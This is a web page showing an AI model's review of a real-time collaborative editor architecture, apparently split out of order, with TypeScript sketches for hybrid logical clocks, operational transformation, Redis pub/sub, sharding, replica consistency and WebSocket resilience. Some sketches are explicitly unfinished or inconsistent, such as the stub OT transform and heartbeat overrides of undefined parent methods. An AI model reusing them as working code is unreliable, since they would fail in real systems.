app.use('/api/users/me', CacheControlMiddleware.privateWithRevalidation(60));
app.use('/api/documents', CacheControlMiddleware.publicWithEtag);  // List with ETags
app.use('/static', CacheControlMiddleware.staticAssets);

What CAN be cached:

// Safe to cache:
// 1. Static assets (JS, CSS, images) - with content hash in filename
// 2. User profile data - short TTL, private
// 3. Document metadata (title, last modified) - with ETag validation
// 4. Organization/team data - short TTL

// CloudFront configuration
const cloudFrontBehaviors = {
  '/static/*': {
    TTL: 31536000,  // 1 year
    compress: true,
    headers: ['Origin']
  },
  '/api/documents/*/content': {
    TTL: 0,  // Never cache
    forwardCookies: 'all',
    forwardHeaders: ['Authorization']
  },
  '/api/*': {
    TTL: 0,
    forwardCookies: 'all',
    forwardHeaders: ['Authorization', 'X-CSRF-Token']
  }
};

6. Scaling Bottlenecks

Issue 6.1: PostgreSQL as Real-Time Message Bus

The Problem: Using PostgreSQL for real-time sync creates:

Write amplification (every keystroke = database write)
Connection exhaustion under load
Latency spikes during vacuuming/checkpointing

100 users typing at 5 chars/second = 500 writes/second
1000 users = 5000 writes/second
PostgreSQL will struggle, and latency will spike

Solution: Tiered Storage Architecture

class TieredDocumentStorage {
  private redis: Redis;
  private pool: Pool;
  private operationBuffer: Map<string, DocumentOperation[]> = new Map();
  private flushInterval: NodeJS.Timeout;

  constructor() {
    // Flush buffered operations every 100ms
    this.flushInterval = setInterval(() => this.flushBuffers(), 100);
  }

  async applyOperation(op: DocumentOperation): Promise<void> {
    // Layer 1: Immediate - Redis for real-time sync
    await this.redis.multi()
      .xadd(
        `doc:${op.documentId}:ops`,
        'MAXLEN', '~', '1000',
        '*',
        'data', JSON.stringify(op)
      )
      .publish(`doc:${op.documentId}`, JSON.stringify(op))
      .exec();

    // Layer 2: Buffered - Batch writes to PostgreSQL
    if (!this.operationBuffer.has(op.documentId)) {
      this.operationBuffer.set(op.documentId, []);
    }
    this.operationBuffer.get(op.documentId)!.push(op);
  }

  private async flushBuffers(): Promise<void> {
    const buffers = new Map(this.operationBuffer);
    this.operationBuffer.clear();

    for (const [documentId, operations] of buffers) {
      if (operations.length === 0) continue;

      try {
        await this.batchInsertOperations(operations);
      } catch (error) {
        // Re-queue failed operations
        const existing = this.operationBuffer.get(documentId) ?? [];
        this.operationBuffer.set(documentId, [...operations, ...existing]);
        console.error(`Failed to flush operations for ${documentId}:`, error);
      }
    }
  }

  private async batchInsertOperations(operations: DocumentOperation[]): Promise<void> {
    const values = operations.map((op, i) => {
      const offset = i * 7;
      return `($${offset + 1}, $${offset + 2}, $${offset + 3}, $${offset + 4}, $${offset + 5}, $${offset + 6}, $${offset + 7})`;
    }).join(', ');

    const params = operations.flatMap(op => [
      op.id, op.documentId, op.userId, op.revision,
      JSON.stringify(op.operation), JSON.stringify(op.timestamp), op.checksum
    ]);

    await this.pool.query(`
      INSERT INTO document_operations 
      (id, document_id, user_id, revision, operation, timestamp, checksum)
      VALUES ${values}
      ON CONFLICT (document_id, revision) DO NOTHING
    `, params);
  }

  // Recovery: Rebuild from PostgreSQL if Redis data is lost
  async recoverFromPostgres(documentId: string, fromRevision: number): Promise<DocumentOperation[]> {
    const { rows } = await this.pool.query(`
      SELECT * FROM document_operations
      WHERE document_id = $1 AND revision > $2
      ORDER BY revision ASC
    `, [documentId, fromRevision]);

    return rows.map(row => ({
      id: row.id,
      documentId: row.document_id,
      userId: row.user_id,
      revision: row.revision,
      operation: JSON.parse(row.operation),
      timestamp: JSON.parse(row.timestamp),
      checksum: row.checksum
    }));
  }
}

Issue 6.2: Organization-Based Partitioning Causes Hot Spots

The Problem: Large organizations (e.g., enterprise customers) create hot partitions:

Organization A (10 users):     Partition 1 - light load
Organization B (10,000 users): Partition 2 - overwhelmed
Organization C (50 users):     Partition 3 - light load

Solution: Document-Level Sharding with Consistent Hashing

class DocumentShardRouter {
  private shards: ShardInfo[];
  private hashRing: ConsistentHashRing;

  constructor(shards: ShardInfo[]) {
    this.shards = shards;
    this.hashRing = new ConsistentHashRing(
      shards.map(s => s.id),
      100  // Virtual nodes per shard
    );
  }

  getShardForDocument(documentId: string): ShardInfo {
    const shardId = this.hashRing.getNode(documentId);
    return this.shards.find(s => s.id === shardId)!;
  }

  // Rebalance when adding/removing shards
  async addShard(newShard: ShardInfo): Promise<void> {
    this.shards.push(newShard);
    this.hashRing.addNode(newShard.id);
    
    // Migrate affected documents
    await this.migrateDocuments(newShard);
  }

  private async migrateDocuments(targetShard: ShardInfo): Promise<void> {
    // Find documents that should now be on the new shard
    for (const shard of this.shards) {
      if (shard.id === targetShard.id) continue;

      const documents = await this.getDocumentsOnShard(shard);
      for (const doc of documents) {
        const correctShard = this.getShardForDocument(doc.id);
        if (correctShard.id === targetShard.id) {
          await this.migrateDocument(doc.id, shard, targetShard);
        }
      }
    }
  }
}

// Shard-aware connection pool
class ShardedConnectionPool {
  private pools: Map<string, Pool> = new Map();
  private router: DocumentShardRouter;

  async query(documentId: string, sql: string, params: any[]): Promise<QueryResult> {
    const shard = this.router.getShardForDocument(documentId);
    const pool = this.pools.get(shard.id);
    
    if (!pool) {
      throw new Error(`No pool for shard ${shard.id}`);
    }

    return pool.query(sql, params);
  }

  // Cross-shard queries (avoid when possible)
  async queryAll(sql: string, params: any[]): Promise<QueryResult[]> {
    const results = await Promise.all(
      Array.from(this.pools.values()).map(pool => pool.query(sql, params))
    );
    return results;
  }
}

Alternative: Vitess or Citus for Automatic Sharding

-- Citus distributed table
SELECT create_distributed_table('document_operations', 'document_id');
SELECT create_distributed_table('documents', 'id');

-- Queries automatically route to correct shard
SELECT * FROM documents WHERE id = 'doc-123';  -- Routes to one shard
SELECT * FROM documents WHERE organization_id = 'org-456';  -- Fan-out query

Issue 6.3: Read Replicas with Replication Lag

The Problem: Read replicas can be seconds behind the primary, causing users to see stale data:

10:00:00.000 - Alice saves document (writes to primary)
10:00:00.500 - Alice refreshes page (reads from replica)
              Replica is 1 second behind - Alice sees old version!
              "Where did my changes go?!"

Solution: Read-Your-Writes Consistency

class ConsistentReadService {
  private primaryPool: Pool;
  private replicaPool: Pool;
  private redis: Redis;

  async read(
    userId: string,
    documentId: string,
    query: string,
    params: any[]
  ): Promise<QueryResult> {
    // Check if user recently wrote to this document
    const lastWriteTime = await this.redis.get(`write:${userId}:${documentId}`);
    
    if (lastWriteTime) {
      const timeSinceWrite = Date.now() - parseInt(lastWriteTime);
      
      // If write was recent, check replica lag
      if (timeSinceWrite < 10000) {  // Within 10 seconds
        const replicaLag = await this.getReplicaLag();
        
        if (replicaLag * 1000 > timeSinceWrite) {
          // Replica hasn't caught up - read from primary
          return this.primaryPool.query(query, params);
        }
      }
    }

    // Safe to read from replica
    return this.replicaPool.query(query, params);
  }

  async write(
    userId: string,
    documentId: string,
    query: string,
    params: any[]
  ): Promise<QueryResult> {
    const result = await this.primaryPool.query(query, params);
    
    // Track write time for read-your-writes consistency
    await this.redis.setex(
      `write:${userId}:${documentId}`,
      60,  // Track for 60 seconds
      Date.now().toString()
    );

    return result;
  }

  private async getReplicaLag(): Promise<number> {
    const { rows } = await this.replicaPool.query(`
      SELECT EXTRACT(EPOCH FROM (NOW() - pg_last_xact_replay_timestamp())) AS lag
    `);
    return rows[0]?.lag ?? 0;
  }
}

// Alternative: LSN-based consistency
class LSNConsistentReadService {
  async write(userId: string, query: string, params: any[]): Promise<{ result: QueryResult; lsn: string }> {
    const result = await this.primaryPool.query(query, params);
    
    // Get current WAL position
    const { rows } = await this.primaryPool.query('SELECT pg_current_wal_lsn()::text AS lsn');
    const lsn = rows[0].lsn;
    
    // Store LSN for user's session
    await this.redis.setex(`session:${userId}:lsn`, 300, lsn);
    
    return { result, lsn };
  }

  async read(userId: string, query: string, params: any[]): Promise<QueryResult> {
    const requiredLsn = await this.redis.get(`session:${userId}:lsn`);
    
    if (requiredLsn) {
      // Wait for replica to catch up (with timeout)
      await this.waitForReplicaLsn(requiredLsn, 5000);
    }

    return this.replicaPool.query(query, params);
  }

  private async waitForReplicaLsn(targetLsn: string, timeoutMs: number): Promise<void> {
    const start = Date.now();
    
    while (Date.now() - start < timeoutMs) {
      const { rows } = await this.replicaPool.query(`
        SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn AS caught_up
      `, [targetLsn]);
      
      if (rows[0].caught_up) return;
      
      await new Promise(resolve => setTimeout(resolve, 50));
    }
    
    // Timeout - fall back to primary
    throw new Error('Replica lag timeout');
  }
}

7. WebSocket Connection Management

Issue 7.1: No Reconnection Strategy

The Problem: WebSocket connections drop frequently (network changes, mobile sleep, etc.). Without proper reconnection, users lose real-time updates.

Solution: Robust Reconnection with Exponential Backoff

class ResilientWebSocket {
  private ws: WebSocket | null = null;
  private url: string;
  private reconnectAttempts = 0;
  private maxReconnectAttempts = 10;
  private baseDelay = 1000;
  private maxDelay = 30000;
  private messageQueue: string[] = [];
  private lastEventId: string | null = null;

  constructor(url: string) {
    this.url = url;
    this.connect();
  }

  private connect(): void {
    // Include last event ID for resumption
    const connectUrl = this.lastEventId 
      ? `${this.url}?lastEventId=${this.lastEventId}`
      : this.url;

    this.ws = new WebSocket(connectUrl);

    this.ws.onopen = () => {
      console.log('WebSocket connected');
      this.reconnectAttempts = 0;
      this.flushMessageQueue();
    };

    this.ws.onclose = (event) => {
      if (event.code !== 1000) {  // Not a clean close
        this.scheduleReconnect();
      }
    };

    this.ws.onerror = (error) => {
      console.error('WebSocket error:', error);
    };

    this.ws.onmessage = (event) => {
      const data = JSON.parse(event.data);
      if (data.eventId) {
        this.lastEventId = data.eventId;
      }
      this.handleMessage(data);
    };
  }

  private scheduleReconnect(): void {
    if (this.reconnectAttempts >= this.maxReconnectAttempts) {
      console.error('Max reconnection attempts reached');
      this.onMaxRetriesExceeded?.();
      return;
    }

    const delay = Math.min(
      this.baseDelay * Math.pow(2, this.reconnectAttempts) + Math.random() * 1000,
      this.maxDelay
    );

    console.log(`Reconnecting in ${delay}ms (attempt ${this.reconnectAttempts + 1})`);
    
    setTimeout(() => {
      this.reconnectAttempts++;
      this.connect();
    }, delay);
  }

  send(message: string): void {
    if (this.ws?.readyState === WebSocket.OPEN) {
      this.ws.send(message);
    } else {
      // Queue message for when connection is restored
      this.messageQueue.push(message);
    }
  }

  private flushMessageQueue(): void {
    while (this.messageQueue.length > 0 && this.ws?.readyState === WebSocket.OPEN) {
      const message = this.messageQueue.shift()!;
      this.ws.send(message);
    }
  }

  // Callbacks
  onMessage?: (data: any) => void;
  onMaxRetriesExceeded?: () => void;

  private handleMessage(data: any): void {
    this.onMessage?.(data);
  }
}

Server-Side: Event Resumption

class WebSocketServer {
  private redis: Redis;

  async handleConnection(ws: WebSocket, req: Request): Promise<void> {
    const documentId = req.query.documentId as string;
    const lastEventId = req.query.lastEventId as string | undefined;

    // Send missed events if client is resuming
    if (lastEventId) {
      const missedEvents = await this.getMissedEvents(documentId, lastEventId);
      for (const event of missedEvents) {
        ws.send(JSON.stringify(event));
      }
    }

    // Subscribe to new events
    this.subscribeToDocument(documentId, ws);
  }

  private async getMissedEvents(documentId: string, lastEventId: string): Promise<any[]> {
    // Use Redis Streams for event sourcing
    const events = await this.redis.xrange(
      `doc:${documentId}:events`,
      lastEventId,
      '+',
      'COUNT', 1000
    );

    return events
      .filter(([id]) => id !== lastEventId)  // Exclude the last seen event
      .map(([id, fields]) => ({
        eventId: id,
        ...this.parseStreamFields(fields)
      }));
  }
}

Issue 7.2: No Heartbeat/Keep-Alive

The Problem: Silent connection failures (NAT timeout, proxy disconnect) aren't detected, leaving "zombie" connections.

Solution: Bidirectional Heartbeat

// Client-side
class HeartbeatWebSocket extends ResilientWebSocket {
  private heartbeatInterval: NodeJS.Timeout | null = null;
  private heartbeatTimeout: NodeJS.Timeout | null = null;
  private readonly HEARTBEAT_INTERVAL = 30000;  // 30 seconds
  private readonly HEARTBEAT_TIMEOUT = 10000;   // 10 seconds to respond

  protected onOpen(): void {
    super.onOpen();
    this.startHeartbeat();
  }

  protected onClose(): void {
    this.stopHeartbeat();
    super.onClose();
  }

  private startHeartbeat(): void {
    this.heartbeatInterval = setInterval(() => {
      if (this.ws?.readyState === WebSocket.OPEN) {
        this.ws.send(JSON.stringify({ type: 'ping', timestamp: Date.now() }));
        
        this.heartbeatTimeout = setTimeout(() => {
          console.log('Heartbeat timeout - closing connection');
          this.ws?.close();
        }, this.HEARTBEAT_TIMEOUT);
      }
    }, this.HEARTBEAT_INTERVAL);
  }

  private stopHeartbeat(): void {
    if (this.heartbeatInterval) clearInterval(this.heartbeatInterval);
    if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
  }

  protected handleMessage(data: any): void {
    if (data.type === 'pong') {
      if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
      return;
    }
    super.handleMessage(data);
  }
}

// Server-side
class WebSocketServerWithHeartbeat {
  private readonly CLIENT_TIMEOUT = 60000;  // 60 seconds without activity

  handleConnection(ws: WebSocket): void {
    let lastActivity = Date.now();

    const checkTimeout = setInterval(() => {
      if (Date.now() - lastActivity > this.CLIENT_TIMEOUT) {
        console.log('Client timeout - closing connection');
        ws.close(4000, 'Timeout');
        clearInterval(checkTimeout);
      }
    }, 10000);

    ws.on('message', (message) => {
      lastActivity = Date.now();
      
      const data = JSON.parse(message.toString());
      if (data.type === 'ping') {
        ws.send(JSON.stringify({ type: 'pong', timestamp: Date.now() }));
        return;
      }
      
      this.handleMessage(ws, data);
    });

    ws.on('close', () => {
      clearInterval(checkTimeout);
    });
  }
}

8. Failure Recovery

Issue 8.1: No Graceful Degradation

The Problem: When components fail, the entire system becomes unusable instead of degrading gracefully.

Solution: Circuit Breakers and Fallbacks

import CircuitBreaker from 'opossum';

class ResilientDocumentService {
  private dbBreaker: CircuitBreaker;
  private redisBreaker: CircuitBreaker;
  private localCache: LRUCache<string, Document>;

  constructor() {
    // Database circuit breaker
    this.dbBreaker = new CircuitBreaker(this.queryDatabase.bind(this), {
      timeout: 3000,           // 3 second timeout
      errorThresholdPercentage: 50,  // Open after 50% failures
      resetTimeout: 30000,     // Try again after 30 seconds
      volumeThreshold: 10      // Minimum requests before opening
    });

    this.dbBreaker.fallback(async (documentId: string) => {
      // Try Redis cache
      return this.getFromRedis(documentId);
    });

    this.dbBreaker.on('open', () => {
      console.error('Database circuit breaker opened');
      this.alertOps('Database circuit breaker opened');
    });

    // Redis circuit breaker
    this.redisBreaker = new CircuitBreaker(this.queryRedis.bind(this), {
      timeout: 1000,
      errorThresholdPercentage: 50,
      resetTimeout: 10000
    });

    this.redisBreaker.fallback(async (key: string) => {
      // Fall back to local cache
      return this.localCache.get(key);
    });
  }

  async getDocument(documentId: string): Promise<Document | null> {
    try {
      // Try local cache first
      const cached = this.localCache.get(documentId);
      if (cached) return cached;

      // Try Redis (through circuit breaker)
      const redisDoc = await this.redisBreaker.fire(documentId);
      if (redisDoc) {
        this.localCache.set(documentId, redisDoc);
        return redisDoc;
      }

      // Try database (through circuit breaker)
      const dbDoc = await this.dbBreaker.fire(documentId);
      if (dbDoc) {
        this.localCache.set(documentId, dbDoc);
        await this.cacheInRedis(documentId, dbDoc);
        return dbDoc;
      }

      return null;
    } catch (error) {
      console.error('All fallbacks failed:', error);
      throw new ServiceUnavailableError('Document service temporarily unavailable');
    }
  }

  // Degraded mode: Allow viewing but not editing
  async saveOperation(op: DocumentOperation): Promise<SaveResult> {
    try {
      await this.dbBreaker.fire(op);
      return { success: true };
    } catch (error) {
      if (this.dbBreaker.opened) {
        // Queue operation for later processing
        await this.queueForRetry(op);
        return { 
          success: false, 
          queued: true,
          message: 'Your changes are saved locally and will sync when service is restored'
        };
      }
      throw error;
    }
  }
}

9. Observability Gaps

Issue 9.1: Missing Metrics and Tracing

The Problem: Without proper observability, you can't diagnose issues or understand system behavior.

Solution: Comprehensive Observability Stack

import { metrics, trace, context } from '@opentelemetry/api';
import { PrometheusExporter } from '@opentelemetry/exporter-prometheus';

class DocumentMetrics {
  private meter = metrics.getMeter('document-service');
  private tracer = trace.getTracer('document-service');

  // Counters
  private operationsTotal = this.meter.createCounter('document_operations_total', {
    description: 'Total number of document operations'
  });

  private conflictsTotal = this.meter.createCounter('document_conflicts_total', {
    description: 'Total number of operation conflicts'
  });

  // Histograms
  private operationLatency = this.meter.createHistogram('document_operation_latency_ms', {
    description: 'Latency of document operations in milliseconds'
  });

  private syncLatency = this.meter.createHistogram('document_sync_latency_ms', {
    description: 'Time from operation submission to all clients receiving it'
  });

  // Gauges
  private activeConnections = this.meter.createObservableGauge('websocket_connections_active', {
    description: 'Number of active WebSocket connections'
  });

  private documentSize = this.meter.createHistogram('document_size_bytes', {
    description: 'Size of documents in bytes'
  });

  // Instrument an operation
  async trackOperation<T>(
    operationType: string,
    documentId: string,
    fn: () => Promise<T>
  ): Promise<T> {
    const span = this.tracer.startSpan(`document.${operationType}`, {
      attributes: {
        'document.id': documentId,
        'operation.type': operationType
      }
    });

    const startTime = Date.now();

    try {
      const result = await context.with(trace.setSpan(context.active(), span), fn);
      
      this.operationsTotal.add(1, {
        operation: operationType,
        status: 'success'
      });

      return result;
    } catch (error) {
      span.recordException(error as Error);
      
      this.operationsTotal.add(1, {
        operation: operationType,
        status: 'error',
        error_type: (error as Error).name
      });

      throw error;
    } finally {
      const duration = Date.now() - startTime;
      this.operationLatency.record(duration, {
        operation: operationType
      });
      span.end();
    }
  }

  recordConflict(documentId: string, conflictType: string): void {
    this.conflictsTotal.add(1, {
      document_id: documentId,
      conflict_type: conflictType
    });
  }

  recordSyncLatency(latencyMs: number): void {
    this.syncLatency.record(latencyMs);
  }
}

// Structured logging
import pino from 'pino';

const logger = pino({
  level: process.env.LOG_LEVEL || 'info',
  formatters: {
    level: (label) => ({ level: label })
  },
  base: {
    service: 'document-service',
    version: process.env.APP_VERSION
  }
});

// Usage
class DocumentService {
  private metrics = new DocumentMetrics();
  private logger = logger.child({ component: 'DocumentService' });

  async applyOperation(op: DocumentOperation): Promise<void> {
    return this.metrics.trackOperation('apply', op.documentId, async () => {
      this.logger.info({
        event: 'operation_received',
        documentId: op.documentId,
        userId: op.userId,
        revision: op.revision
      });

      // ... apply operation

      this.logger.info({
        event: 'operation_applied',
        documentId: op.documentId,
        newRevision: op.revision
      });
    });
  }
}

10. Summary: Priority Matrix

Issue	Severity	Effort	Priority
Client clock timestamps	🔴 Critical	Medium	P0
Paragraph-level LWW	🔴 Critical	High	P0
Cross-server WebSocket isolation	🔴 Critical	Medium	P0
30-second snapshot data loss	🔴 Critical	Medium	P0
JWT in localStorage	🟠 High	Low	P1
CDN caching API responses	🟠 High	Low	P1
Missing document authorization	🟠 High	Medium	P1
PostgreSQL as message bus	🟠 High	High	P1
No WebSocket reconnection	🟡 Medium	Low	P2
No heartbeat/keep-alive	🟡 Medium	Low	P2
Read replica lag	🟡 Medium	Medium	P2
Organization-based sharding	🟡 Medium	High	P2
HTML storage (XSS)	🟡 Medium	Medium	P2
Missing observability	🟡 Medium	Medium	P2
No circuit breakers	🟢 Low	Medium	P3

Recommended Architecture

┌─────────────────────────────────────────────────────────────────────────────┐
│                              Load Balancer                                   │
│                    (Sticky sessions by document ID)                          │
└─────────────────────────────────────────────────────────────────────────────┘
                                      │
                    ┌─────────────────┼─────────────────┐
                    ▼                 ▼                 ▼
            ┌──────────────┐  ┌──────────────┐  ┌──────────────┐
            │  API Server  │  │  API Server  │  │  API Server  │
            │  + WebSocket │  │  + WebSocket │  │  + WebSocket │
            │  + OT Engine │  │  + OT Engine │  │  + OT Engine │
            └──────────────┘  └──────────────┘  └──────────────┘
                    │                 │                 │
                    └─────────────────┼─────────────────┘
                                      │
                    ┌─────────────────┼─────────────────┐
                    ▼                 ▼                 ▼
            ┌──────────────┐  ┌──────────────┐  ┌──────────────┐
            │    Redis     │  │    Redis     │  │    Redis     │
            │  (Primary)   │  │  (Replica)   │  │  (Replica)   │
            │  - Pub/Sub   │  │              │  │              │
            │  - Op Cache  │  │              │  │              │
            │  - Sessions  │  │              │  │              │
            └──────────────┘  └──────────────┘  └──────────────┘
                                      │
                    ┌─────────────────┼─────────────────┐
                    ▼                 ▼                 ▼
            ┌──────────────┐  ┌──────────────┐  ┌──────────────┐
            │  PostgreSQL  │  │  PostgreSQL  │  │  PostgreSQL  │
            │  (Primary)   │  │  (Replica)   │  │  (Replica)   │
            │  - Documents │  │  (Read-only) │  │  (Read-only) │
            │  - Operations│  │              │  │              │
            │  - Snapshots │  │              │  │              │
            └──────────────┘  └──────────────┘  └──────────────┘

This architecture addresses all critical issues while maintaining scalability and reliability.

Debug This Architecture

Turn this model response into notes, narration, or a short video

Auto Notes Transcript Narrate Video Cut

Partner link

This output is part of our open dataset — 5K+ AI responses across 200 models

About Claude Opus 4.5

Capabilities

ConversationReasoningCode GenerationAnalysisTool Use

Specifications

Provider: Anthropic
Released: 2025-11-24
Size: XLARGE

Keep exploring

SAME PROMPT

Claude Sonnet 4.6's version

Same prompt, different result

COMPARE

Claude Opus 4.5 vs Gemini 3.1 Pro Preview

Both outputs, side by side

Rival

Back to Claude Opus 4.5

Debug This Architecture

Claude Opus 4 5's response to the 'Debug This Architecture' challenge.

Claude Opus 4.5

February 3, 2026

Text

?
Prompt

Response

Claude Opus 4.5Debug This Architecture

Claude Opus 4.5

Comprehensive Architecture Review: Real-time Collaborative Document Editor

This architecture has several critical issues that will cause data loss, poor user experience, and scaling problems. Let me analyze each systematically.

1. Critical Data Consistency Issues

Issue 1.1: Client Clock-Based Timestamps (Last-Write-Wins)

The Problem: Using client clocks for conflict resolution is fundamentally broken. Client clocks can be wrong by hours, days, or even years.

Timeline (Server Time):
10:00:00 - Alice types "Hello" (Alice's clock says 15:00:00)
10:00:01 - Bob types "World" (Bob's clock says 09:00:00)

Result: Alice's edit wins because 15:00:00 > 09:00:00
Bob's edit is silently discarded, even though it came AFTER Alice's

Real-world scenarios that break this:

Mobile devices with dead CMOS batteries
Users in different timezones with misconfigured clocks
VMs with clock drift
Malicious users who set their clock to year 2099 to always "win"

Solution: Hybrid Logical Clocks (HLC) or Server-Assigned Lamport Timestamps

// Hybrid Logical Clock implementation
interface HLC {
  wallTime: number;    // Physical time from server
  logical: number;     // Logical counter for ordering
  nodeId: string;      // Tie-breaker for simultaneous events
}

class HybridLogicalClock {
  private wallTime: number = 0;
  private logical: number = 0;
  private nodeId: string;

  constructor(nodeId: string) {
    this.nodeId = nodeId;
  }

  // Called when sending an event
  tick(): HLC {
    const now = Date.now();
    if (now > this.wallTime) {
      this.wallTime = now;
      this.logical = 0;
    } else {
      this.logical++;
    }
    return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
  }

  // Called when receiving an event
  receive(remote: HLC): HLC {
    const now = Date.now();
    if (now > this.wallTime && now > remote.wallTime) {
      this.wallTime = now;
      this.logical = 0;
    } else if (this.wallTime > remote.wallTime) {
      this.logical++;
    } else if (remote.wallTime > this.wallTime) {
      this.wallTime = remote.wallTime;
      this.logical = remote.logical + 1;
    } else {
      // Equal wall times
      this.logical = Math.max(this.logical, remote.logical) + 1;
    }
    return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
  }

  // Compare two HLCs
  static compare(a: HLC, b: HLC): number {
    if (a.wallTime !== b.wallTime) return a.wallTime - b.wallTime;
    if (a.logical !== b.logical) return a.logical - b.logical;
    return a.nodeId.localeCompare(b.nodeId);
  }
}

Trade-offs:

Approach	Pros	Cons
HLC	Preserves causality, tolerates clock drift	Slightly more complex, ~24 bytes per timestamp
Server timestamps only	Simple	Doesn't capture happens-before relationships
Vector clocks	Perfect causality tracking	O(n) space where n = number of clients

Issue 1.2: Paragraph-Level Last-Write-Wins Destroys Work

The Problem: When two users edit the same paragraph, one user's work is completely discarded.

Original paragraph: "The quick brown fox"

Alice (10:00:00): Changes to "The quick brown fox jumps"
Bob   (10:00:01): Changes to "The slow brown fox"

Result: "The slow brown fox"
Alice's addition of "jumps" is silently lost

Solution: Operational Transformation (OT) or CRDTs

For a Google Docs-like experience, OT is the industry standard:

// Operational Transformation for text
type Operation = 
  | { type: 'retain'; count: number }
  | { type: 'insert'; text: string }
  | { type: 'delete'; count: number };

class OTDocument {
  private content: string = '';
  private revision: number = 0;

  // Transform operation A against operation B
  // Returns A' such that apply(apply(doc, B), A') === apply(apply(doc, A), B')
  static transform(a: Operation[], b: Operation[]): [Operation[], Operation[]] {
    const aPrime: Operation[] = [];
    const bPrime: Operation[] = [];
    
    let indexA = 0, indexB = 0;
    let opA = a[indexA], opB = b[indexB];

    while (opA || opB) {
      // Insert operations go first
      if (opA?.type === 'insert') {
        aPrime.push(opA);
        bPrime.push({ type: 'retain', count: opA.text.length });
        opA = a[++indexA];
        continue;
      }
      if (opB?.type === 'insert') {
        bPrime.push(opB);
        aPrime.push({ type: 'retain', count: opB.text.length });
        opB = b[++indexB];
        continue;
      }

      // Both are retain or delete - handle based on lengths
      // ... (full implementation would handle all cases)
    }

    return [aPrime, bPrime];
  }

  // Apply operation to document
  apply(ops: Operation[]): void {
    let index = 0;
    let newContent = '';

    for (const op of ops) {
      switch (op.type) {
        case 'retain':
          newContent += this.content.slice(index, index + op.count);
          index += op.count;
          break;
        case 'insert':
          newContent += op.text;
          break;
        case 'delete':
          index += op.count;
          break;
      }
    }
    newContent += this.content.slice(index);
    this.content = newContent;
    this.revision++;
  }
}

// Server-side OT handling
class OTServer {
  private document: OTDocument;
  private history: Operation[][] = [];

  receiveOperation(clientRevision: number, ops: Operation[]): Operation[] {
    // Transform against all operations that happened since client's revision
    let transformedOps = ops;
    
    for (let i = clientRevision; i < this.history.length; i++) {
      const [newOps] = OTDocument.transform(transformedOps, this.history[i]);
      transformedOps = newOps;
    }

    this.document.apply(transformedOps);
    this.history.push(transformedOps);
    
    return transformedOps;
  }
}

Alternative: CRDTs (Conflict-free Replicated Data Types)

// Simplified RGA (Replicated Growable Array) CRDT for text
interface RGANode {
  id: { timestamp: HLC; nodeId: string };
  char: string | null;  // null = tombstone (deleted)
  parent: RGANode['id'] | null;
}

class RGADocument {
  private nodes: Map<string, RGANode> = new Map();
  private clock: HybridLogicalClock;

  constructor(nodeId: string) {
    this.clock = new HybridLogicalClock(nodeId);
  }

  insert(position: number, char: string): RGANode {
    const parentId = this.getNodeAtPosition(position - 1)?.id ?? null;
    const node: RGANode = {
      id: { timestamp: this.clock.tick(), nodeId: this.clock['nodeId'] },
      char,
      parent: parentId
    };
    this.nodes.set(this.nodeIdToString(node.id), node);
    return node;
  }

  delete(position: number): void {
    const node = this.getNodeAtPosition(position);
    if (node) node.char = null;  // Tombstone
  }

  merge(remoteNode: RGANode): void {
    const key = this.nodeIdToString(remoteNode.id);
    if (!this.nodes.has(key)) {
      this.nodes.set(key, remoteNode);
      this.clock.receive(remoteNode.id.timestamp);
    }
  }

  getText(): string {
    return this.getOrderedNodes()
      .filter(n => n.char !== null)
      .map(n => n.char)
      .join('');
  }

  private nodeIdToString(id: RGANode['id']): string {
    return `${id.timestamp.wallTime}-${id.timestamp.logical}-${id.nodeId}`;
  }

  private getOrderedNodes(): RGANode[] {
    // Topological sort based on parent relationships
    // with timestamp as tie-breaker
    // ... implementation
  }
}

Trade-offs:

Approach	Pros	Cons
OT	Compact operations, well-understood	Requires central server for ordering, complex transform functions
CRDT	Decentralized, works offline	Larger metadata overhead, tombstones accumulate
Last-write-wins	Simple	Loses data

Recommendation: Use OT for real-time sync (like Google Docs does) with CRDT for offline support.

2. Real-time Synchronization Failures

Issue 2.1: Cross-Server WebSocket Isolation

The Problem: With round-robin load balancing, users on the same document connect to different servers. Changes only broadcast to clients on the SAME server.

Document: "Project Proposal"

Server A:                    Server B:
├── Alice (editing)          ├── Bob (editing)
└── Charlie (viewing)        └── Diana (viewing)

Alice types "Hello" → Charlie sees it immediately
                   → Bob and Diana wait up to 2 seconds (polling interval)

This creates a jarring, inconsistent experience where some users see real-time updates and others see delayed updates.

Solution: Redis Pub/Sub for Cross-Server Broadcasting

import Redis from 'ioredis';
import { WebSocket } from 'ws';

class DocumentSyncService {
  private redisPub: Redis;
  private redisSub: Redis;
  private localClients: Map<string, Set<WebSocket>> = new Map();
  private serverId: string;

  constructor() {
    this.serverId = crypto.randomUUID();
    this.redisPub = new Redis(process.env.REDIS_URL);
    this.redisSub = new Redis(process.env.REDIS_URL);
    
    this.setupSubscriptions();
  }

  private setupSubscriptions(): void {
    this.redisSub.psubscribe('doc:*', (err) => {
      if (err) console.error('Failed to subscribe:', err);
    });

    this.redisSub.on('pmessage', (pattern, channel, message) => {
      const documentId = channel.replace('doc:', '');
      const parsed = JSON.parse(message);
      
      // Don't re-broadcast our own messages
      if (parsed.serverId === this.serverId) return;
      
      this.broadcastToLocalClients(documentId, parsed.payload);
    });
  }

  async publishChange(documentId: string, change: DocumentChange): Promise<void> {
    const message = JSON.stringify({
      serverId: this.serverId,
      payload: change,
      timestamp: Date.now()
    });

    // Publish to Redis for other servers
    await this.redisPub.publish(`doc:${documentId}`, message);
    
    // Also broadcast to local clients
    this.broadcastToLocalClients(documentId, change);
  }

  private broadcastToLocalClients(documentId: string, change: DocumentChange): void {
    const clients = this.localClients.get(documentId);
    if (!clients) return;

    const message = JSON.stringify(change);
    for (const client of clients) {
      if (client.readyState === WebSocket.OPEN) {
        client.send(message);
      }
    }
  }

  registerClient(documentId: string, ws: WebSocket): void {
    if (!this.localClients.has(documentId)) {
      this.localClients.set(documentId, new Set());
    }
    this.localClients.get(documentId)!.add(ws);

    ws.on('close', () => {
      this.localClients.get(documentId)?.delete(ws);
    });
  }
}

Alternative: Sticky Sessions with Consistent Hashing

// Nginx configuration for sticky sessions based on document ID
/*
upstream api_servers {
    hash $arg_documentId consistent;
    server api1:3000;
    server api2:3000;
    server api3:3000;
}
*/

// Or implement in application load balancer
